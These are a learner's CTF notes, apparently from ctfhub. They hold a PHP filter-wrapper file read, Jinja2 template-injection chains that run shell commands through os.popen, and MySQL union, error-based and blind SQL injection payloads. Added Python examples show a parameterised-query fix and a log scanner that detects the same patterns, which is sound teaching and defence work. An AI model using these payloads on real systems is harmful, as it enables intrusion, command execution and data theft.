The regex filters out "flag", and the challenge hints at useless.php, so the php://filter wrapper is used to read useless.php. Payload as follows (what exactly is the regex filter?):
?text=data://text/plain,welcome to the zjctf&file=php://filter/read=convert.base64-encode/resource=useless.php
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].open('在这里输文件名', 'r').read() }}{% endif %}{% endfor %}
Command execution
{% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('在这里输命令').read()") }}{% endif %}{% endfor %}
// Ah,, honestly I'm not quite sure what a PoC is, or what this is for.
// Short for Proof Of Concept. In hacker circles it means a proof-of-concept program: running the program yields the expected result, which verifies the idea.
{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% if b.__class__ == {}.__class__ %} {% if 'eval' in b.keys() %} {{ b['eval']('__import__("os").popen("id").read()') }} {% endif %} {% endif %} {% endfor %} {% endif %} {% endfor %}
Print environment variables
{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% if b.__class__ == {}.__class__ %} {% if 'eval' in b.keys() %} {{ b['eval']('__import__("os").popen("env").read()') }} {% endif %} {% endif %} {% endfor %} {% endif %} {% endfor %}
{% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals__.values() %} {% if b.__class__ == {}.__class__ %} {% if 'eval' in b.keys() %} {{ b['eval']('__import__("os").popen("ls").read()') }} // the ls here is the command to execute {% endif %} {% endif %} {% endfor %} {% endif %} {% endfor %}
First, ls to list the directory:
I ♥ Flask & application.py flag.txt requirements.txt static templates
-- single-line SQL statement
UPDATE user SET username='robot', password='robot' WHERE username = 'root';
-- multi-line SQL statement
UPDATE user
SET username='robot', password='robot'
WHERE username = 'root';
-1 union select 1,group_concat(schema_name) from information_schema.schemata
Query all database names
-1 union select 1,(select table_name from information_schema.tables where table_schema='sqli' limit 0,1)
Query the first table name of the current database; then increase the limit offset to query the remaining table names
Or query all table names at once
-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'
Query the flag
-1 union select 1,group_concat(flag) from sqli.flag
Get the flag
/// The screenshot was taken from the writeup provided by ctfhub (because I forgot to take one and didn't want to spend more coins to open it again)
/// Compared with the ones below, this one is shorter and I can just about follow it,,,, (at the level of only being able to use it /// change the challenge and I won't know how to use it (most likely)
Why, why, why does it have to be like this
Why does entering it like this produce this result
What do the displayed results mean
Right now it's pure guesswork,,,
QWQ
What does each statement mean????
I'll add comments gradually later
2. String-type injection
[String-type injection] - ctfhub
Manual (sqlmap to be added)
/// The 123 that appears below can be replaced with any username that does not exist in the database
Entering 1 gives normal output, echoing ID and Data
Union query to get the database name
123' union select database(),2 #
Query tables: get the table names
123' union select group_concat(table_name),3 from information_schema.tables where table_schema='sqli' #
Query fields: get the column names
123' union select group_concat(column_name) ,3 from information_schema.columns where table_name='flag' #
Query the flag
123' union select flag,3 from sqli.flag #
Get the flag
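As an added example (not from the original notes or from ctfhub), the following Python/sqlite3 code shows why the string-type union injection above works and how a bound parameter stops it. The `news` and `flag` tables and the flag value are constructed; the payload is the page's `123' union select flag,3 from sqli.flag #` adapted to SQLite syntax (no `sqli.` schema prefix, `--` instead of MySQL's `#` comment).

```python
import sqlite3


# Constructed sample schema: a "news" table behind the id lookup and a "flag"
# table, mirroring the ctfhub layout; the flag value is made up here.
def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE news (id TEXT, data TEXT);
        INSERT INTO news VALUES ('1', 'hello'), ('2', 'world');
        CREATE TABLE flag (flag TEXT);
        INSERT INTO flag VALUES ('ctfhub{constructed_example_flag}');
    """)
    return conn


def lookup_vulnerable(conn: sqlite3.Connection, user_id: str) -> list:
    # The value is spliced into the SQL text, so a quote closes the literal,
    # "union select" appends attacker-chosen rows and "--" comments out the rest.
    sql = f"SELECT id, data FROM news WHERE id = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_safe(conn: sqlite3.Connection, user_id: str) -> list:
    # Bound parameter: the driver passes the value separately from the SQL
    # text, so it is compared as data and never parsed as SQL.
    return conn.execute("SELECT id, data FROM news WHERE id = ?", (user_id,)).fetchall()


# The page's payload "123' union select flag,3 from sqli.flag #", adapted to
# SQLite (no "sqli." schema prefix; "--" instead of MySQL's "#" comment).
PAYLOAD = "123' union select flag,3 from flag --"


def demo() -> dict:
    conn = make_db()
    return {
        "normal": lookup_vulnerable(conn, "1"),
        "vulnerable": lookup_vulnerable(conn, PAYLOAD),
        "safe": lookup_safe(conn, PAYLOAD),
    }


if __name__ == "__main__":
    for name, rows in demo().items():
        print(f"{name:>10}: {rows}")
```

Running it shows the concatenated query returning the flag row while the parameterised query returns nothing, because the whole payload is compared against the `id` column as one string. The second half of the fix, which matters for the error-based section below, is to never echo driver error messages to the client: log them server-side and return a generic message.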
?id=1 and(select 1 from(select count(*),concat((select table_name from information_schema.tables where table_schema=database()),floor(rand(0)*2))x from information_schema.tables group by x)a)
查询错误: Subquery returns more than 1 row
?id=1 and(select 1 from(select count(*),concat((select table_name from information_schema.tables where table_schema=database() limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)
The second table, flag, holds the flag; here a 1 is concatenated as the query statement, so ignore it. 查询错误: Every derived table must have its own alias
Query column names
?id=1 and(select 1 from(select count(*),concat((select column_name from information_schema.columns where table_name="flag"),floor(rand(0)*2))x from information_schema.tables group by x)a)
查询错误: Duplicate entry 'flag1' for key 'group_key'
The column flag of the second table flag holds the flag
Query the value
?id=1 and(select 1 from(select count(*),concat((select flag from flag),floor(rand(0)*2))x from information_schema.tables group by x)a)
查询错误: Duplicate entry 'ctfhub{8a213fb30ca8bc66650b5a93}1' for key 'group_key'
1. Guess the length of the database name: x is some value; >x or <x also works
' and length(database())=x--+
2. Guess the database name (anything a system function can reveal, e.g. MySQL version, OS version, etc.):
' and left(database(),1)='s'--+
3. Get the tables in the database:
' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1)) = 101--+
4. Get the column names in the table:
' and 1=(select 1 from information_schema.columns where table_name='users' and column_name regexp '^us[a-z]' limit 0,1)--+
5. Get the contents of a column in the table: x is the error return value; as long as you don't give the correct value, anything works
' and ord(mid((select ifnull(cast(username as char),x)from security.users order by id limit 0,1),1,1))=68--+
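From the detection side, here is an added Python example (not part of the original notes) that scans web-server access-log lines for the SSTI payload markers from the Flask section at the top, and for the union-based, error-based and boolean-blind SQL injection patterns from the sections above. The log lines, source IPs, thresholds and rule names are constructed for this example; the query strings in them are the page's own payloads, URL-encoded the way a server would record them.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log sample (not real traffic); paths are URL-encoded as a
# web server would record them.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /?name=alice HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 512
10.0.0.5 - - [01/Jan/2024:10:00:02 +0000] "GET /?name=%7B%25+for+c+in+%5B%5D.__class__.__base__.__subclasses__()+%25%7D HTTP/1.1" 200 900
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /?id=-1+union+select+1,group_concat(schema_name)+from+information_schema.schemata HTTP/1.1" 200 700
10.0.0.9 - - [01/Jan/2024:10:01:05 +0000] "GET /?id=1+and(select+1+from(select+count(*),concat((select+flag+from+flag),floor(rand(0)*2))x+from+information_schema.tables+group+by+x)a) HTTP/1.1" 500 300
10.0.0.9 - - [01/Jan/2024:10:01:10 +0000] "GET /?id=1'+and+length(database())=4--+ HTTP/1.1" 200 512
10.0.0.9 - - [01/Jan/2024:10:01:11 +0000] "GET /?id=1'+and+ascii(substr((select+table_name+from+information_schema.tables+where+table_schema=database()+limit+0,1),1,1))=101--+ HTTP/1.1" 200 512
"""

# Common log format: source IP and the request path.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/')

# Each rule is matched against the URL-decoded query string.
RULES = {
    # Jinja expression/statement delimiters (the {{7*7}} probe and {% for %} loops)
    "ssti_probe": re.compile(r"\{\{.*?\}\}|\{%.*?%\}"),
    # the gadget chain used in the Flask payloads above
    "ssti_gadget": re.compile(r"__class__|__subclasses__|__globals__|__builtins__|__import__|popen\("),
    "sqli_union": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "sqli_schema": re.compile(r"information_schema\.|group_concat\(", re.I),
    # floor(rand(0)*2) ... group by: the duplicate-key error trick
    "sqli_error_based": re.compile(r"floor\(rand\(", re.I),
    # character-at-a-time comparisons from the boolean-blind section
    "sqli_blind": re.compile(r"\b(?:ascii|ord)\((?:substr|mid)\(|\blength\(database\(\)\)|\bleft\(database\(\)", re.I),
}


def scan_log(text: str) -> list:
    """Return one finding per request whose decoded query matches any rule."""
    findings = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, path = m.groups()
        query = unquote_plus(path.partition("?")[2])  # decode before matching
        hits = [name for name, rx in RULES.items() if rx.search(query)]
        if hits:
            findings.append({"ip": ip, "query": query, "rules": hits})
    return findings


def suspicious_sources(findings: list, threshold: int = 3) -> list:
    """Blind injection is noisy: flag sources with many matching requests."""
    counts = {}
    for f in findings:
        counts[f["ip"]] = counts.get(f["ip"], 0) + 1
    return sorted(ip for ip, n in counts.items() if n >= threshold)


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f["ip"], f["rules"], f["query"][:60])
    print("sources over threshold:", suspicious_sources(scan_log(SAMPLE_LOG)))
```

Decoding the query string before matching matters: the `{%` and `[]` in the SSTI probes arrive as `%7B%25` and `%5B%5D`, and `--+` only becomes the `-- ` comment after `+` is turned back into a space. The per-source count is what catches the blind technique in section 5, where each individual request looks harmless but the volume does not.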